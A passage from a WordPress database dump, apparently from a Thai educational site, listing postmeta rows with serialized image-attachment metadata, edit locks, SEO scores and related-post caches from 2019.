(13021, 5779, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:522;s:6:\"height\";i:520;s:4:\"file\";s:20:\"2019/05/424243-3.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"424243-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"424243-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"424243-3-301x300.jpg\";s:5:\"width\";i:301;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13022, 5781, '_wp_attached_file', '2019/05/นิลมังกร.jpg'),
(13023, 5781, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:731;s:4:\"file\";s:36:\"2019/05/นิลมังกร.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"นิลมังกร-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"นิลมังกร-300x137.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"นิลมังกร-768x351.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"นิลมังกร-1024x468.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"นิลมังกร-400x183.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13024, 5786, '_wp_attached_file', '2019/06/Untitled-7.png'),
(13025, 5786, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/06/Untitled-7.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-7-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-7-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-7-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-7-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13032, 5787, '_wp_attached_file', '2019/06/Untitled-7.jpg'),
(13033, 5787, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/06/Untitled-7.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-7-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-7-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-7-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-7-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13037, 5789, '_wp_attached_file', '2019/06/Untitled-8.jpg'),
(13038, 5789, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/06/Untitled-8.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-8-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-8-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-8-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-8-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13047, 5790, '_edit_lock', '1560399441:14'),
(13048, 5790, '_edit_last', '14'),
(13049, 5791, '_wp_attached_file', '2019/06/130662-01-ประกาศรับสมัครครูจ้าง.pdf'),
(13053, 5790, '_hide_featured', NULL),
(13054, 5790, '_yoast_wpseo_content_score', '60'),
(13055, 5790, '_yoast_wpseo_primary_category', '3'),
(13056, 5790, '_wpas_done_all', '1'),
(13059, 5790, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575325806;s:7:\"payload\";a:0:{}}}'),
(13060, 5793, '_wp_attached_file', '2019/06/Untitled-9.jpg'),
(13061, 5793, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/06/Untitled-9.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-9-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-9-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-9-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-9-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13064, 5794, '_wp_attached_file', '2019/06/Untitled-10.jpg'),
(13065, 5794, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/06/Untitled-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Untitled-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Untitled-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Untitled-10-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Untitled-10-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13070, 5795, '_wp_attached_file', '2019/06/Untitled-11.jpg'),
(13071, 5795, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/06/Untitled-11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Untitled-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-11-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Untitled-11-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Untitled-11-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Untitled-11-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13074, 5797, '_wp_attached_file', '2019/06/Untitled-1.jpg'),
(13075, 5797, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:22:\"2019/06/Untitled-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13076, 1751, '_thumbnail_id', '5805'),
(13077, 1751, '_yoast_wpseo_content_score', '30'),
(13078, 5799, '_wp_attached_file', '2019/06/Untitled-2.jpg'),
(13079, 5799, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1140;s:6:\"height\";i:1147;s:4:\"file\";s:22:\"2019/06/Untitled-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-2-768x773.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:773;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Untitled-2-1018x1024.jpg\";s:5:\"width\";i:1018;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-2-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13080, 5800, '_wp_attached_file', '2019/06/Untitled-3.jpg'),
(13081, 5800, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1177;s:4:\"file\";s:22:\"2019/06/Untitled-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-3-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-3-768x773.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:773;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Untitled-3-1018x1024.jpg\";s:5:\"width\";i:1018;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-3-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13082, 5802, '_wp_attached_file', '2019/06/Untitled-5.jpg'),
(13083, 5802, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:22:\"2019/06/Untitled-5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-5-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-5-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-5-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-5-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13084, 5803, '_wp_attached_file', '2019/06/Untitled-6.jpg'),
(13085, 5803, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:22:\"2019/06/Untitled-6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-6-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-6-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-6-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-6-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13086, 5804, '_wp_attached_file', '2019/06/Untitled-7-1.jpg'),
(13087, 5804, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:24:\"2019/06/Untitled-7-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-7-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-7-1-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-7-1-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-7-1-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-7-1-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13088, 5805, '_wp_attached_file', '2019/06/Untitled-7-2.jpg'),
(13089, 5805, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:24:\"2019/06/Untitled-7-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-7-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-7-2-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-7-2-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-7-2-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-7-2-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13090, 5806, '_edit_lock', '1560476493:14'),
(13091, 5806, '_edit_last', '14'),
(13092, 5807, '_wp_attached_file', '2019/06/140662-01.jpg'),
(13093, 5807, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/06/140662-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"140662-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"140662-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"140662-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"140662-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"140662-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13094, 5806, '_thumbnail_id', '5807'),
(13098, 5806, '_hide_featured', NULL),
(13099, 5806, '_yoast_wpseo_content_score', '60'),
(13100, 5806, '_yoast_wpseo_primary_category', '31'),
(13101, 5806, '_wpas_done_all', '1'),
(13110, 5806, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575716778;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5760;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:6334;}}}}'),
(13115, 5812, '_wp_attached_file', '2019/05/1560679197182.jpg'),
